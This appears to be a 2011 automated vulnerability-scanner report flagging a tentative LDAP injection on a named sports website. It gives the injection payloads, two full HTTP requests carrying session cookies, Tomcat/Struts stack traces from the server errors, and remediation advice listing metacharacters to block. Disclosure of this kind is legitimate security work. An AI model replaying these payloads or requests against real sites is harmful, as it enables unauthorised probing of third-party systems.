LDAP Injection, springframework, Proof of Concept

CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')

Report generated by CloudScan Vulnerability Crawler at Thu Jan 13 12:12:02 CST 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading


1. LDAP injection



1. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://msn.foxsports.com
Path:   /module/pollaction

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /module/*)(sn=*;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 11073

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
ramework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
   $Proxy96.getContent(Unknown Source)
   com.foxsports.action.module.ModuleAction.execute(ModuleAction.java:107)
   sun.reflect.GeneratedMethodAccessor21304.invoke(Unknown Source)
   sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
   java.lang.reflect.Method.invoke(Method.java:597)
   com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:441)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:243)
   com.opensymphony.xwork2.interceptor.DefaultWorkflowInterceptor.doIntercept(DefaultWorkflowInterceptor.java:165)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   org.apache.struts2.interceptor.validation.AnnotationValidationInterceptor.doIntercept(AnnotationValidationInterceptor.java:68)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor.intercept(ConversionErrorInterceptor.java:122)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.StaticParametersInterceptor.intercept(StaticParametersInterceptor.java:179)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237
...[SNIP]...

Request 2

GET /module/*)!(sn=*;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:32:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 11147

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
ramework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
   $Proxy96.getContent(Unknown Source)
   com.foxsports.action.module.ModuleAction.execute(ModuleAction.java:107)
   sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
   sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
   sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
   java.lang.reflect.Method.invoke(Method.java:597)
   com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:441)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:243)
   com.opensymphony.xwork2.interceptor.DefaultWorkflowInterceptor.doIntercept(DefaultWorkflowInterceptor.java:165)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   org.apache.struts2.interceptor.validation.AnnotationValidationInterceptor.doIntercept(AnnotationValidationInterceptor.java:68)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor.intercept(ConversionErrorInterceptor.java:122)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.StaticParametersInterceptor.intercept(StaticParametersInterceptor.java:179)
   com.opensymp
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Thu Jan 13 12:12:02 CST 2011.